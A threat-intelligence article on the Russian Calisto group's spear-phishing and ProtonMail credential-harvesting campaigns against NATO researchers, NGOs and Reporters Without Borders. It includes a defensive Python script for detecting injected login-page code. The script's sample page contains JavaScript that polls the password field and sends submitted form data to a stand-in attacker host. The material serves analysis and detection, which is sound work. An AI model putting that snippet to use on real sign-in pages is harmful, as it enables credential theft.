Russian Calisto Hackers Target NATO Research with ClickFix Malware

Russian intelligence-linked cyber threat actors have intensified their operations against NATO research organizations, Western defense contractors, and NGOs supporting Ukraine, employing sophisticated phishing and credential harvesting techniques.

The Calisto intrusion set, attributed to Russia’s FSB intelligence service, has escalated its spear-phishing campaigns throughout 2025, leveraging the ClickFix malicious code technique to target high-value entities across Europe and beyond.

The Calisto group, also known as ColdRiver or Star Blizzard and formally attributed to Russia’s Center 18 for Information Security (TsIB) within the FSB, has been conducting cyber espionage operations since at least April 2017.

These campaigns have grown increasingly sophisticated, targeting military and strategic research sectors including NATO entities, Ukrainian defense contractors, NGOs, think tanks, and individuals with expertise in Russian affairs.

The intrusion set’s activities have consistently aligned with Russian strategic interests, particularly focusing on entities involved in Ukrainian support operations and intelligence infrastructure.

ClickFix Disrupts NATO’s Cybersecurity

In May and June 2025, security analysts were contacted by multiple organizations, including the prominent French NGO Reporters Without Borders (RSF), concerning suspicious spear-phishing attempts attributed to Calisto.

The organization, which has provided crucial assistance to Russian journalists fleeing persecution, became a focal point for the threat actor’s intelligence collection efforts.

Calisto’s targeting of RSF represents a significant escalation in the group’s victimology, reflecting Russia’s broader efforts to suppress international press freedom advocacy.

The phishing methodology employed by Calisto demonstrates considerable sophistication and social engineering refinement.

The group leverages ProtonMail addresses impersonating trusted contacts, initiating contact by asking recipients to review documents but deliberately withholding attachments.

When victims request the missing file, threat actors respond with malicious payloads disguised as legitimate PDF documents.

The threat actor employs PHP scripts configured with GET parameters mimicking legitimate Urchin Tracking Module (UTM) analytics parameters, using JavaScript redirection to obscure the phishing chain.

This multi-stage approach increases credibility by creating a seemingly authentic exchange before deploying malware or harvesting credentials.

One particularly notable case involved an RSF staff member receiving a deceptive email in French, with a properly formatted version of a trusted contact’s signature.

The email contained a non-functional link to trigger a follow-up response. Upon request, the attacker sent a second email containing a link redirecting to a compromised website, which in turn forwarded to a ProtonDrive URL hosting the malicious content.

In a second documented case, attackers deployed a ZIP archive disguised with a .pdf extension, further obfuscating the malicious nature of the payload.

Typical Calisto PDFs leading to phishing webpages.

Technical analysis of the recovered phishing kit reveals a homemade infrastructure explicitly designed to target ProtonMail accounts.

The kit employs an Adversary-in-the-Middle (AiTM) technique, injecting malicious JavaScript into the ProtonMail sign-in page while maintaining visual authenticity.

Calisto phishing kit for Protonmail.

The malicious code forces the victim to focus on the password field every 250 milliseconds and communicates with an attacker-controlled API to intercept credentials and relay two-factor authentication codes.
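The injected behaviour described above (a timer that keeps re-focusing the password field, plus calls to an attacker-controlled API) is something a defender can check a sign-in page for. The following audit script is an added example, not code from the article or from the phishing kit; the page HTML and hostnames it uses are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collect inline <script> bodies and external script src values from a page."""
    def __init__(self):
        super().__init__()
        self.inline, self.external, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


# Heuristics for the two behaviours described in the article: a short-interval timer
# acting on a password field, and outbound calls to an origin other than the page's.
FOCUS_POLL = re.compile(r"setInterval\s*\((.*?),\s*(\d+)\s*\)", re.S)
OUTBOUND = re.compile(r"""(?:fetch|open)\s*\(\s*(?:['"][A-Z]+['"]\s*,\s*)?['"](https?://[^'"]+)['"]""")


def audit_login_page(html: str, page_url: str, max_poll_ms: int = 1000) -> list:
    """Return human-readable findings that suggest an injected credential-relay script.

    In production an allowlist of legitimate CDN hosts would be added before
    treating every foreign origin as suspicious."""
    parser = _ScriptCollector()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for body in parser.inline:
        for m in FOCUS_POLL.finditer(body):
            if "password" in m.group(1) and "focus" in m.group(1) and int(m.group(2)) <= max_poll_ms:
                findings.append(f"password field re-focused every {m.group(2)} ms")
        for m in OUTBOUND.finditer(body):
            host = urlparse(m.group(1)).hostname
            if host and host != page_host:
                findings.append(f"inline script calls foreign origin {host}")
    for src in parser.external:
        host = urlparse(src).hostname
        if host and host != page_host:
            findings.append(f"external script loaded from {host}")
    return findings


# Constructed sample page: a sign-in form with an injected polling/relay script.
SAMPLE_PAGE = """<html><body>
<form><input type="email"><input type="password" id="pw"></form>
<script src="/static/app.js"></script>
<script>
setInterval(function(){document.querySelector('input[type=password]').focus();},250);
document.forms[0].addEventListener('submit', function(e){
  fetch('https://relay.attacker.invalid/api/submit', {method:'POST', body:new FormData(e.target)});
});
</script>
</body></html>"""
```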

Upon successful credential capture, analyst-controlled systems recorded access from IP address 196.44.117.196, identified as associated with Big Mama Proxy services.

Infrastructure analysis indicates Calisto’s reliance on compromised websites as redirectors, likely breached through credentials leaked by information stealers.

Successful login from the Calisto phishing kit.

Domain registration patterns reveal a shift from Regway to Namecheap’s DNS infrastructure, providing medium-confidence indicators for attributing domains to Calisto operations.

Despite extensive public documentation of Calisto’s tactics and techniques, the group continues targeting Ukraine’s supporters with refined social engineering and credential harvesting operations.

Organizations involved in Ukrainian advocacy, defense research, or humanitarian efforts supporting the region face heightened risk from this persistent threat actor.
